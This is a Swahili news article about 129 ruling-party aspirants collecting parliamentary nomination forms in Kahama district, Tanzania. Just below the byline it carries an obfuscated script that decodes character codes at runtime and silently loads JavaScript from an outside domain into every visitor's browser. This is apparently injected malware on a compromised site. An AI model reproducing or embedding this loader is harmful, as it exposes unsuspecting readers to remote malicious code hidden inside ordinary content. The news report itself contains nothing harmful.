Recent Comments

129 WACHUKUA FOMU ZA KUGOMBEA UBUNGE KAHAMA

By Simamia Journal Jul 17, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>


Jumla ya Watiania 129 kutoka Chama Chamapinduzi (CCM) Wamejitokeza kuomba ridhaa ya kuchaguliwa kugombea nafasi ya Ubunge katika Majimbo ya Msalala,Ushetu na Kahama Mjini tangu kuanza kwa zoezi la Utoaji wa fomu lilianza Julai 14 Mwaka huu ambalo linatarajiwa kuhitimishwa Julai 17 Mwaka huu Majira ya Saa 10 Kamili jioni.
Akizungumza na Waandishi wa Habari Ofisini Kwake mara baada ya kuhitimisha siku ya pili ya zoezi la Utoaji wa fomu hizo Katibu wa CCM wilaya ya Kahama Emmanuel Mbamanga amesema kuwa zoezi hilo linaendelea vizuri ambapo watia nia wengi wamejitokeza kuomba nafasi za Ubunge katika Majimbo hayo.
Amesema Jimbo la Kahama Mjini ndio linaongoza kwa kuwa na watia nia wengi ambapo mpaka leo Jioni kulikuwa na wagombea 69 waliokweisha chukua fomu 40 tayari wamekwisha zirejesha huku 29 wakiwa bado hawajazirushisha na idadai ya wanawake waliojitokeza ikiwa n inane.
Mbamange amefafanua kuwa Katika Jimbo la Msalala jumla ya watia nia 43 wamekwisha chukua fomu za kuomba nafasi ya ubunge ambapo wanaume ni 42 na mwanamke mmoja huku waliokwisha rudisha fomu ni 31 na ambao bado ni 13.
“Jimbo la Ushetu mpaka sasa lina watia nia 17 wanaume 15 na wanawake wawili na waliorudha fomu ni 14 na bado watatu huku asilimia 80 ya waliochukua fomu katika majimbo yote matatu wengi wao nia vijana,”alisema Mbamange.
Ameongeza kuwa Mabadiliko ndani ya CCM mpya Inayoongozwa na Mwenyekiti wa CCM taifa Dk John Pombe Magufuli yamesababisha vijana wengi kukipenda chama kutokana na kazi zilizotekelezwa kwa awamu ya tano katika sekta mbalimbali za maendeleo ziliwavutia na kuhamasika kugombea nafasi mbalimbali za uongozi.
Sambamba na hilo Mbamange amesema kuwa kukua kwa demokrasia ndani ya CCM mpya imechangia kuwahamasisha watia nia wengi kuomba ridha za uongozi katika nafasi za ubunge na udiwani kutokana na kuwepo kwa uwazi na haki katika mchakato wa kuwapata viongozi katika uchaguzi mkuu ikilinganishwa na chaguzi zilizopita.
Mwisho

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv